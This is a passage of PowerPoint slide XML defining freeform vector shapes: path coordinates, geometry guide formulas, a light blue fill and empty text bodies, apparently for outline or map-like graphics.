                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="171"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36145" name="Freeform 278"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1447" y="2946"/>
                <a:ext cx="203" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 202 w 203"/>
                  <a:gd name="T1" fmla="*/ 197 h 295"/>
                  <a:gd name="T2" fmla="*/ 199 w 203"/>
                  <a:gd name="T3" fmla="*/ 208 h 295"/>
                  <a:gd name="T4" fmla="*/ 200 w 203"/>
                  <a:gd name="T5" fmla="*/ 224 h 295"/>
                  <a:gd name="T6" fmla="*/ 193 w 203"/>
                  <a:gd name="T7" fmla="*/ 234 h 295"/>
                  <a:gd name="T8" fmla="*/ 194 w 203"/>
                  <a:gd name="T9" fmla="*/ 246 h 295"/>
                  <a:gd name="T10" fmla="*/ 197 w 203"/>
                  <a:gd name="T11" fmla="*/ 261 h 295"/>
                  <a:gd name="T12" fmla="*/ 190 w 203"/>
                  <a:gd name="T13" fmla="*/ 272 h 295"/>
                  <a:gd name="T14" fmla="*/ 190 w 203"/>
                  <a:gd name="T15" fmla="*/ 280 h 295"/>
                  <a:gd name="T16" fmla="*/ 185 w 203"/>
                  <a:gd name="T17" fmla="*/ 284 h 295"/>
                  <a:gd name="T18" fmla="*/ 176 w 203"/>
                  <a:gd name="T19" fmla="*/ 295 h 295"/>
                  <a:gd name="T20" fmla="*/ 162 w 203"/>
                  <a:gd name="T21" fmla="*/ 284 h 295"/>
                  <a:gd name="T22" fmla="*/ 156 w 203"/>
                  <a:gd name="T23" fmla="*/ 274 h 295"/>
                  <a:gd name="T24" fmla="*/ 145 w 203"/>
                  <a:gd name="T25" fmla="*/ 269 h 295"/>
                  <a:gd name="T26" fmla="*/ 129 w 203"/>
                  <a:gd name="T27" fmla="*/ 260 h 295"/>
                  <a:gd name="T28" fmla="*/ 108 w 203"/>
                  <a:gd name="T29" fmla="*/ 249 h 295"/>
                  <a:gd name="T30" fmla="*/ 85 w 203"/>
                  <a:gd name="T31" fmla="*/ 228 h 295"/>
                  <a:gd name="T32" fmla="*/ 82 w 203"/>
                  <a:gd name="T33" fmla="*/ 213 h 295"/>
                  <a:gd name="T34" fmla="*/ 65 w 203"/>
                  <a:gd name="T35" fmla="*/ 181 h 295"/>
                  <a:gd name="T36" fmla="*/ 59 w 203"/>
                  <a:gd name="T37" fmla="*/ 177 h 295"/>
                  <a:gd name="T38" fmla="*/ 58 w 203"/>
                  <a:gd name="T39" fmla="*/ 167 h 295"/>
                  <a:gd name="T40" fmla="*/ 38 w 203"/>
                  <a:gd name="T41" fmla="*/ 128 h 295"/>
                  <a:gd name="T42" fmla="*/ 22 w 203"/>
                  <a:gd name="T43" fmla="*/ 105 h 295"/>
                  <a:gd name="T44" fmla="*/ 7 w 203"/>
                  <a:gd name="T45" fmla="*/ 96 h 295"/>
                  <a:gd name="T46" fmla="*/ 4 w 203"/>
                  <a:gd name="T47" fmla="*/ 91 h 295"/>
                  <a:gd name="T48" fmla="*/ 9 w 203"/>
                  <a:gd name="T49" fmla="*/ 86 h 295"/>
                  <a:gd name="T50" fmla="*/ 0 w 203"/>
                  <a:gd name="T51" fmla="*/ 72 h 295"/>
                  <a:gd name="T52" fmla="*/ 6 w 203"/>
                  <a:gd name="T53" fmla="*/ 62 h 295"/>
                  <a:gd name="T54" fmla="*/ 19 w 203"/>
                  <a:gd name="T55" fmla="*/ 53 h 295"/>
                  <a:gd name="T56" fmla="*/ 17 w 203"/>
                  <a:gd name="T57" fmla="*/ 63 h 295"/>
                  <a:gd name="T58" fmla="*/ 22 w 203"/>
                  <a:gd name="T59" fmla="*/ 68 h 295"/>
                  <a:gd name="T60" fmla="*/ 31 w 203"/>
                  <a:gd name="T61" fmla="*/ 74 h 295"/>
                  <a:gd name="T62" fmla="*/ 39 w 203"/>
                  <a:gd name="T63" fmla="*/ 77 h 295"/>
                  <a:gd name="T64" fmla="*/ 50 w 203"/>
                  <a:gd name="T65" fmla="*/ 53 h 295"/>
                  <a:gd name="T66" fmla="*/ 66 w 203"/>
                  <a:gd name="T67" fmla="*/ 42 h 295"/>
                  <a:gd name="T68" fmla="*/ 83 w 203"/>
                  <a:gd name="T69" fmla="*/ 34 h 295"/>
                  <a:gd name="T70" fmla="*/ 96 w 203"/>
                  <a:gd name="T71" fmla="*/ 15 h 295"/>
                  <a:gd name="T72" fmla="*/ 96 w 203"/>
                  <a:gd name="T73" fmla="*/ 5 h 295"/>
                  <a:gd name="T74" fmla="*/ 107 w 203"/>
                  <a:gd name="T75" fmla="*/ 4 h 295"/>
                  <a:gd name="T76" fmla="*/ 113 w 203"/>
                  <a:gd name="T77" fmla="*/ 13 h 295"/>
                  <a:gd name="T78" fmla="*/ 126 w 203"/>
                  <a:gd name="T79" fmla="*/ 26 h 295"/>
                  <a:gd name="T80" fmla="*/ 133 w 203"/>
                  <a:gd name="T81" fmla="*/ 29 h 295"/>
                  <a:gd name="T82" fmla="*/ 135 w 203"/>
                  <a:gd name="T83" fmla="*/ 36 h 295"/>
                  <a:gd name="T84" fmla="*/ 150 w 203"/>
                  <a:gd name="T85" fmla="*/ 37 h 295"/>
                  <a:gd name="T86" fmla="*/ 159 w 203"/>
                  <a:gd name="T87" fmla="*/ 36 h 295"/>
                  <a:gd name="T88" fmla="*/ 170 w 203"/>
                  <a:gd name="T89" fmla="*/ 36 h 295"/>
                  <a:gd name="T90" fmla="*/ 180 w 203"/>
                  <a:gd name="T91" fmla="*/ 44 h 295"/>
                  <a:gd name="T92" fmla="*/ 176 w 203"/>
                  <a:gd name="T93" fmla="*/ 57 h 295"/>
                  <a:gd name="T94" fmla="*/ 183 w 203"/>
                  <a:gd name="T95" fmla="*/ 64 h 295"/>
                  <a:gd name="T96" fmla="*/ 176 w 203"/>
                  <a:gd name="T97" fmla="*/ 66 h 295"/>
                  <a:gd name="T98" fmla="*/ 166 w 203"/>
                  <a:gd name="T99" fmla="*/ 69 h 295"/>
                  <a:gd name="T100" fmla="*/ 145 w 203"/>
                  <a:gd name="T101" fmla="*/ 75 h 295"/>
                  <a:gd name="T102" fmla="*/ 133 w 203"/>
                  <a:gd name="T103" fmla="*/ 89 h 295"/>
                  <a:gd name="T104" fmla="*/ 133 w 203"/>
                  <a:gd name="T105" fmla="*/ 100 h 295"/>
                  <a:gd name="T106" fmla="*/ 124 w 203"/>
                  <a:gd name="T107" fmla="*/ 107 h 295"/>
                  <a:gd name="T108" fmla="*/ 120 w 203"/>
                  <a:gd name="T109" fmla="*/ 118 h 295"/>
                  <a:gd name="T110" fmla="*/ 135 w 203"/>
                  <a:gd name="T111" fmla="*/ 141 h 295"/>
                  <a:gd name="T112" fmla="*/ 140 w 203"/>
                  <a:gd name="T113" fmla="*/ 148 h 295"/>
                  <a:gd name="T114" fmla="*/ 147 w 203"/>
                  <a:gd name="T115" fmla="*/ 152 h 295"/>
                  <a:gd name="T116" fmla="*/ 166 w 203"/>
                  <a:gd name="T117" fmla="*/ 153 h 295"/>
                  <a:gd name="T118" fmla="*/ 172 w 203"/>
                  <a:gd name="T119" fmla="*/ 160 h 295"/>
                  <a:gd name="T120" fmla="*/ 175 w 203"/>
                  <a:gd name="T121" fmla="*/ 173 h 295"/>
                  <a:gd name="T122" fmla="*/ 185 w 203"/>
                  <a:gd name="T123" fmla="*/ 172 h 295"/>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203"/>
                  <a:gd name="T187" fmla="*/ 0 h 295"/>
                  <a:gd name="T188" fmla="*/ 203 w 203"/>
                  <a:gd name="T189" fmla="*/ 295 h 295"/>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203" h="295">
                    <a:moveTo>
                      <a:pt x="188" y="171"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="196" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
